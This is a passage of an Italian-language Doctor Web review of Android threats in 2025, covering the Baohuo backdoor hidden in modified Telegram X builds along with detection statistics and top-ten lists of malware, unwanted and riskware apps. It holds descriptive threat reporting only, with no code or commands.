&lt;p&gt;Ad ottobre Doctor Web &lt;a href="https://news.drweb-av.it/show/?i=15076" target="_blank"&gt;ha pubblicato&lt;/a&gt; informazioni sul backdoor multifunzionale &lt;a href="https://vms.drweb-av.it/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=it"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;, che i nostri analisti dei virus hanno scoperto in versioni modificate del programma di messaggistica Telegram X. La principale fonte della sua diffusione sono stati siti malevoli, su cui le potenziali vittime finiscono attraverso la pubblicità in applicazioni mobili. Su questi siti agli utenti viene proposto di installare Telegram X, presumibilmente per cercare partner per la comunicazione e gli incontri. Tali risorse internet sono orientati in maggiore misura agli abitanti di Indonesia e Brasile. Allo stesso tempo, abbiano rilevato questo backdoor anche in una serie di store di app Android di terze parti.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/04_Android.Backdoor.Baohuo.1.origin_website_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/04_Android.Backdoor.Baohuo.1.origin_website_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Esempio di sito malevolo da cui veniva scaricata la versione trojan di Telegram X&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Uno dei compiti di &lt;a href="https://vms.drweb-av.it/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=it"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; è il furto di dati confidenziali. Ad esempio, il malware ruba il login e la password dell'account Telegram della vittima, la cronologia della corrispondenza nell'app di messaggistica, gli SMS in arrivo, i contatti dalla rubrica del dispositivo, nonché è in grado di intercettare il contenuto degli appunti. I malintenzionati lo utilizzano, però, non solo come applicazione spia. Con l'ausilio di &lt;a href="https://vms.drweb-av.it/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=it"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; loro effettivamente possono gestire l'account hackerato e controllare il funzionamento di Telegram X modificando le sue funzionalità. Così, il backdoor consente di aggiungere impercettibilmente l'utente e cancellarlo da canali Telegram, entrare a suo nome in chat e nascondere i dispositivi autorizzati per il suo account. Per eseguire azioni che richiedono un intervento nella logica di funzionamento dell'applicazione, viene utilizzato il framework Xposed. I cybercriminali gestiscono il backdoor sia in un modo tradizionale: tramite il server C2, e sia inviando comandi tramite il database Redis, il che in precedenza non si riscontrava in altri programmi malevoli per SO Android. Il numero totale di dispositivi infettati da &lt;a href="https://vms.drweb-av.it/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=it"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; ha superato 58.000. Sono stati interessati circa 3.000 vari modelli di smartphone, tablet, TV box e persino auto con computer di bordo basati su Android.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/05_Android.Backdoor.Baohuo.1.origin_map_en_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/05_Android.Backdoor.Baohuo.1.origin_map_en_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Paesi con il maggior numero di dispositivi infettati da &lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/em&gt;&lt;/p&gt;

&lt;h3&gt;Statistiche&lt;/h3&gt;

&lt;p&gt;Secondo i dati della statistica di rilevamento di Dr.Web Security Space per dispositivi mobili, nel 2025 le minacce Android più diffuse sono stati i vari programmi malevoli: gli utenti li affrontavano nell'81,11% dei casi. Dopo di essi, con una quota del 10,73%, si sono posizionate le applicazioni potenzialmente pericolose. La terza posizione è occupata dai programmi pubblicitari, che venivano rilevati nel 5,89% dei casi. L'attività più bassa si osservava da parte dei software indesiderati: rappresentano il 2,27% dei rilevamenti.&lt;/p&gt;

&lt;p&gt;Rispetto all'anno prima, la quota dei programmi malevoli e potenzialmente pericolosi è cresciuta, mentre la quota dei software indesiderati e pubblicitari è diminuita.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/06_2025_threat_type_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/06_2025_threat_type_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;&lt;b&gt;Applicazioni malevole&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;Da più anni i trojan pubblicitari della famiglia &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; rimangono leader per numero di rilevamenti. Nel 2025 la situazione è rimasta la stessa, tuttavia, nei 12 mesi passati la loro quota è diminuita leggermente dal 31,95% al 27,42%.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/07_Android.HiddenAds_dynamics_2025_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/07_Android.HiddenAds_dynamics_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Questi trojan visualizzano fastidiose pubblicità sotto forma di banner e video a schermo intero. Per rendere più difficile per gli utenti il rilevamento e la rimozione dai dispositivi infetti dei programmi malevoli, dopo l'installazione questi ultimi cercano di "nascondersi", ad esempio, nascondendo o sostituendo le proprie icone nel menu della schermata principale.&lt;/p&gt;

&lt;p&gt;Il rappresentante più attivo della famiglia si è rivelato &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.657.origin&lt;/b&gt; che rappresenta oltre un terzo di tutti i rilevamenti. Il trojan era stato avvistato dai nostri analisti dei virus nel 2024, e durante questo periodo è diventato leader. Rappresenta una delle molteplici varianti di &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1994&lt;/b&gt;, un programma malevolo conosciuto dal 2021. Si sono diffuse anche alcune sue nuove versioni, ad esempio, &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.666.origin&lt;/b&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.673.origin&lt;/b&gt;. Non si può escludere che con il tempo esse anche possono salire in cima alla statistica, come è accaduto in precedenza con altre varianti di &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1994&lt;/b&gt;.&lt;/p&gt;

&lt;p&gt;Durante l'anno, gli utenti di nuovo affrontavano il sottofamiglia &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;, Aegis, tuttavia, la quota di tali programmi malevoli del totale di rilevamenti della famiglia è diminuita notevolmente dal 17,37% al 3,11%. Questi trojan si distinguono, tra l'altro, per loro la capacità di avviarsi automaticamente dopo l'installazione. Tra di essi sono state le più attive le varianti &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds.Aegis&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds.Aegis&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds.Aegis&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds.Aegis&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.8.origin&lt;/b&gt;.&lt;/p&gt;

&lt;p&gt;I software malevoli secondi per diffusione si sono rivelati i trojan pubblicitari &lt;a href="https://vms.drweb-av.it/search/?q=Android.MobiDash&amp;lng=it"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; la cui quota, rispetto al 2024, è salita dal 5,38% al 15,64%. Il leader tra di essi era &lt;a href="https://vms.drweb-av.it/search/?q=Android.MobiDash&amp;lng=it"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7859&lt;/b&gt;. Dopo di essi si sono posizionati i programmi falsificazione &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;, che vengono utilizzati per scopi fraudolenti, e invece di fornire le funzionalità promesse, caricano vari siti. Hanno rappresentato il 10,94% dei rilevamenti. È un indicatore inferiore rispetto al 2024 quando la loro quota ammontava al 18,28%. Tale diminuzione è avvenuta, tra l'altro, anche a causa di a una minore attività del trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1600&lt;/b&gt;, tuttavia, esso rimane ancora il rappresentante più diffuso della famiglia. Il suo compito principale è caricare siti di casinò online.&lt;/p&gt;

&lt;p&gt;La quota dei programmi trojan della famiglia &lt;a href="https://vms.drweb-av.it/search/?q=Android.Spy&amp;lng=it"&gt;&lt;b&gt;Android.Spy&lt;/b&gt;&lt;/a&gt;, che realizzano varie funzionalità spia, si è ridotta dall'11,52% al 3,09%. Allo stesso tempo, è aumentata l'attività dei trojan bancari. La loro quota del numero totale di rilevamenti delle applicazioni malevole ha raggiunto il 6,94% contro l'indicatore del 6,29% l'anno prima.&lt;/p&gt;

&lt;p&gt;Nel 2025 dal 5,49% al 6,01% è aumentato il numero di rilevamenti dei packer software, che possono utilizzare, tra l'altro, anche i malintenzionati al fine di proteggere malware dal rilevamento e analisi. Il più spesso sui dispositivi protetti venivano rilevati i programmi malevoli con il packer &lt;a href="https://vms.drweb-av.it/search/?q=Android.Packed&amp;lng=it"&gt;&lt;b&gt;Android.Packed&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.57146&lt;/b&gt;.&lt;/p&gt;

&lt;p&gt;Si sono diffuse varie mod malevole dell'applicazione di messaggistica WhatsApp. Tra di esse erano varianti (rilevate da Dr.Web come &lt;a href="https://vms.drweb-av.it/search/?q=Android.Click&amp;lng=it"&gt;&lt;b&gt;Android.Click&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1812&lt;/b&gt;) che caricano siti web impercettibilmente per le vittime. Inoltre, si osservava un'attività aumentata dei trojan multifunzionali della famiglia &lt;a href="https://vms.drweb-av.it/search/?q=Android.Triada&amp;lng=it"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt;, che i malintenzionati possono incorporare nel firmware di dispositivi Android. La loro quota è cresciuta dal 2,74% al 7,48%.&lt;/p&gt;

&lt;p&gt;Le dieci applicazioni Android malevole più frequentemente rilevate nel 2025 sono:&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/08_2025_malware_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/08_2025_malware_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.657.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4214&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.655.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4213&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.666.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Programmi trojan per la visualizzazione di pubblicità invadenti. I campioni di questa famiglia spesso vengono distribuiti sotto le apparenze di applicazioni innocue e in alcuni casi vengono installati nella directory di sistema da altri software malevoli. Entrando su dispositivi Android, tali trojan pubblicitari di solito nascondono all'utente la propria presenza sul sistema: per esempio, nascondono l'icona dell'applicazione dal menu della schermata principale.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.MobiDash&amp;lng=it"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7859&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Programma trojan che visualizza annunci pubblicitari invadenti. È un modulo software che gli sviluppatori software incorporano in applicazioni.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1600&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Programma trojan che carica il sito web specificato nelle sue impostazioni. Le varianti conosciute di questa applicazione malevola caricano un sito di casinò online.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.Click&amp;lng=it"&gt;&lt;b&gt;Android.Click&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1812&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di mod malevole dell'applicazione di messaggistica WhatsApp, che impercettibilmente per l'utente possono caricare vari siti in modalità background.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.Packed&amp;lng=it"&gt;&lt;b&gt;Android.Packed&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.57146&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di applicazioni malevole che sono impacchettate tramite un popolare programma di offuscamento di codice commerciale.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.Triada&amp;lng=it"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5847&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di un packer per i trojan della famiglia &lt;a href="https://vms.drweb-av.it/search/?q=Android.Triada&amp;lng=it"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt;, studiato per proteggerli dall'analisi e dal rilevamento. Il più delle volte i malintenzionati lo utilizzano insieme a mod malevole dell'applicazione di messaggistica Telegram, in cui questi trojan sono direttamente integrati.&lt;/dd&gt;
&lt;/dl&gt;

&lt;p&gt;&lt;b&gt;Software indesiderati&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;I software indesiderati più diffusi nel 2025 di nuovo sono diventate le applicazioni &lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeMoney&amp;lng=it"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;, che rappresentano il 51,96% dei rilevamenti. Suggeriscono agli utenti di completare determinate attività per ricompense, e presumibilmente in seguito consentirebbero di convertire il premio in denaro reale. Tuttavia, in fin dei conti non avviene alcun pagamento. Insieme a &lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeMoney&amp;lng=it"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt; si sono diffusi altri programmi simili, ad esempio: &lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeMoney&amp;lng=it"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.14&lt;/b&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeMoney&amp;lng=it"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.16&lt;/b&gt;, ma gli utenti li riscontravano con una frequenza notevolmente minore.&lt;/p&gt;

&lt;p&gt;Alla seconda posizione con il 10,37% si sono collocati i programmi &lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeAntiVirus&amp;lng=it"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;, che imitano il funzionamento di antivirus e rilevano minacce inesistenti. Per "l'eliminazione" dell'infezione, suggeriscono di acquistare una versione di software completa.&lt;/p&gt;

&lt;p&gt;Le applicazioni &lt;a href="https://vms.drweb-av.it/search/?q=Program.CloudInject&amp;lng=it"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;, che vengono modificate nel servizio cloud CloudInject, con una quota del 6,41% sono diventate le terze per diffusione. Le loro varianti, rilevate come &lt;a href="https://vms.drweb-av.it/search/?q=Program.CloudInject&amp;lng=it"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5&lt;/b&gt;, con un indicatore del 5,08% si sono collocate accanto ad esse alla quarta posizione. Le modifiche a tali programmi vengono apportate direttamente sul server remoto, mentre l'accesso al servizio viene fornito dall'utility &lt;a href="https://vms.drweb-av.it/search/?q=Tool.CloudInject&amp;lng=it"&gt;&lt;b&gt;Tool.CloudInject&lt;/b&gt;&lt;/a&gt; che è solo l'involucro per il suo uso. Durante la modifica ai programmi vengono aggiunti autorizzazioni di sistema pericolose e un codice offuscato. Inoltre, tramite il servizio CloudInject i modificatori possono gestire in remoto le applicazioni modificate, ad esempio, bloccarle e chiedere di inserire un codice per l'ulteriore utilizzo.&lt;/p&gt;

&lt;p&gt;Nel 2025 si osservava una leggera crescita del numero di rilevamenti di una serie di programmi che possono essere utilizzati per monitorare utenti e controllare la loro attività. Nelle mani dei malintenzionati, tali strumenti si trasformano in software spia. Così, la quota dell'applicazione &lt;a href="https://vms.drweb-av.it/search/?q=Program.TrackView&amp;lng=it"&gt;&lt;b&gt;Program.TrackView&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt; e della sua variante &lt;a href="https://vms.drweb-av.it/search/?q=Program.TrackView&amp;lng=it"&gt;&lt;b&gt;Program.TrackView&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt; è aumentata rispettivamente dal 2,40% al 2,91% e dallo 0,21% allo 0,97%. La quota di &lt;a href="https://vms.drweb-av.it/search/?q=Program.SecretVideoRecorder&amp;lng=it"&gt;&lt;b&gt;Program.SecretVideoRecorder&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt; è salita dal 2,03% al 2,56%, e quella della sua variante &lt;a href="https://vms.drweb-av.it/search/?q=Program.SecretVideoRecorder&amp;lng=it"&gt;&lt;b&gt;Program.SecretVideoRecorder&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt; dallo 0,90% all'1,02%. L'indicatore del programma &lt;b&gt;Program.SnoopPhone.1.origin&lt;/b&gt; è aumentato dallo 0,31% all'1,01%.&lt;/p&gt;

&lt;p&gt;Le dieci applicazioni indesiderate più frequentemente rilevate nel 2025 sono:&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/09_2025_unwanted_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/09_2025_unwanted_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeMoney&amp;lng=it"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeMoney&amp;lng=it"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.14&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di applicazioni che presumibilmente consentirebbero di guadagnare con l'effettuazione di determinate azioni o compiti. Questi programmi simulano l'accredito di premi, tuttavia, per ritirare il denaro "guadagnato", è necessario accumulare una determinata somma. Di solito hanno una lista dei sistemi di pagamento e delle banche più popolari attraverso cui presumibilmente sarebbe possibile trasferire i premi. Ma anche quando gli utenti riescono ad accumulare la somma sufficiente per il prelievo, non ricevono i pagamenti promessi. Con questo record vengono rilevati anche altri software indesiderati basati sul codice di tali programmi.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeAntiVirus&amp;lng=it"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di programmi pubblicitari che simulano il funzionamento di software antivirus. Tali programmi possono segnalare minacce inesistenti e ingannare gli utenti chiedendo di pagare per l'acquisto di una versione completa.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.CloudInject&amp;lng=it"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.CloudInject&amp;lng=it"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di applicazioni Android modificate tramite il servizio cloud CloudInject e l'omonima utility Android (aggiunta al database dei virus Dr.Web come &lt;a href="https://vms.drweb-av.it/search/?q=Tool.CloudInject&amp;lng=it"&gt;&lt;b&gt;Tool.CloudInject&lt;/b&gt;&lt;/a&gt;). Tali programmi vengono modificati sul server remoto, e l'utente (modificatore) interessato a modificarli non ha il controllo su che cosa esattamente verrà incorporato in essi. Inoltre, le applicazioni ricevono un set di autorizzazioni pericolose. Dopo la modificazione dei programmi, al modificatore compare la possibilità di gestirli in remoto: bloccarli, visualizzare dialoghi configurabili, tracciare l'installazione e la rimozione di altri software ecc.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.TrackView&amp;lng=it"&gt;&lt;b&gt;Program.TrackView&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.TrackView&amp;lng=it"&gt;&lt;b&gt;Program.TrackView&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di un'applicazione che consente di monitorare gli utenti attraverso i dispositivi Android. Utilizzando questo programma, i malintenzionati possono rilevare la posizione dei dispositivi di destinazione, utilizzare la fotocamera per registrare video e scattare foto, effettuare l'ascolto tramite il microfono, creare registrazioni audio ecc.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.SecretVideoRecorder&amp;lng=it"&gt;&lt;b&gt;Program.SecretVideoRecorder&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.SecretVideoRecorder&amp;lng=it"&gt;&lt;b&gt;Program.SecretVideoRecorder&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di varie versioni di un'applicazione per la ripresa di foto e video in background attraverso le fotocamere integrate di dispositivi Android. Questo programma può funzionare impercettibilmente consentendo di disattivare le notifiche di registrazione, nonché cambiare con quelle false l'icona e la descrizione dell'app. Tali funzionalità lo rendono potenzialmente pericoloso.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Program.SnoopPhone.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Programma per il monitoraggio dei proprietari di dispositivi Android. Consente di leggere SMS, ottenere informazioni su chiamate, tracciare la posizione e registrare l'audio dell'ambiente circostante.&lt;/dd&gt;
&lt;/dl&gt;

&lt;p&gt;&lt;b&gt;Programmi potenzialmente pericolosi&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;Nel 2025 sono diventati i software potenzialmente pericolosi più diffusi i programmi modificati tramite lo strumento NP Manager. È un'utility per la modifica di applicazioni, che contiene vari moduli per l'offuscamento e la protezione del codice dei programmi, nonché per l'aggiramento del controllo della loro firma digitale dopo la modifica. I malintenzionati spesso la adoperano per la protezione di applicazioni malevole in modo da ostacolare il loro rilevamento da parte degli antivirus. La quota di tali programmi, rispetto al 2024, è cresciuta dal 24,52% al 53,59%, ed essi hanno rappresentato già più della metà dei rilevamenti dei software potenzialmente pericolosi. Le varianti riscontrati con la maggiore frequenza sui dispositivi protetti sono &lt;b&gt;Tool.NPMod.3&lt;/b&gt; (32.85%), &lt;b&gt;Tool.NPMod.1&lt;/b&gt; (12.61%), &lt;b&gt;Tool.NPMod.1.origin&lt;/b&gt; (3.02%) e &lt;b&gt;Tool.NPMod.4&lt;/b&gt; (2.31%).&lt;/p&gt;

&lt;p&gt;Dal 3,93% all'8,11% è cresciuto il numero di rilevamenti di &lt;a href="https://vms.drweb-av.it/search/?q=Tool.Androlua&amp;lng=it"&gt;&lt;b&gt;Tool.Androlua&lt;/b&gt;&lt;/a&gt; — una serie di framework creati per lo sviluppo di applicazioni Android in linguaggio di programmazione Lua. Essi richiedono numerose autorizzazioni di sistema, incluso l'uso del servizio di funzioni di accessibilità di Android. I programmi creati con il loro ausilio sono costruiti su script Lua che sono criptati e vengono decriptati solo immediatamente prima dell'esecuzione. Tali script potenzialmente possono essere malevoli. Dall'8,16% al 10,06% è cresciuta la quota delle applicazioni modificate tramite l'utility &lt;a href="https://vms.drweb-av.it/search/?q=Tool.LuckyPatcher&amp;lng=it"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;. Questo strumento modifica i programmi installati scaricando da internet script appositamente preparati.&lt;/p&gt;

&lt;p&gt;Allo stesso tempo, la quota delle utility &lt;a href="https://vms.drweb-av.it/search/?q=Tool.SilentInstaller&amp;lng=it"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;, che consentono di avviare applicazioni Android senza installazione, è diminuita dal 33,10% al 10,55%. Le varianti della famiglia più frequenti nel 2025 sono stati &lt;a href="https://vms.drweb-av.it/search/?q=Tool.SilentInstaller&amp;lng=it"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.14.origin&lt;/b&gt; (4.66%), &lt;a href="https://vms.drweb-av.it/search/?q=Tool.SilentInstaller&amp;lng=it"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.6.origin&lt;/b&gt; (2.07%) и &lt;a href="https://vms.drweb-av.it/search/?q=Tool.SilentInstaller&amp;lng=it"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7.origin&lt;/b&gt; (1.88%). Inoltre, dal 13,17% al 2,58% è scesa la quota dei programmi protetti dal packer &lt;a href="https://vms.drweb-av.it/search/?q=Tool.Packer&amp;lng=it"&gt;&lt;b&gt;Tool.Packer&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;.&lt;/p&gt;

&lt;p&gt;Le dieci applicazioni potenzialmente pericolose più diffuse rilevate su dispositivi Android nel 2025 sono:&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/10_2025_riskware_ru.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/10_2025_riskware_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.3&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.1.origin&lt;/b&gt;&lt;/dt&gt;
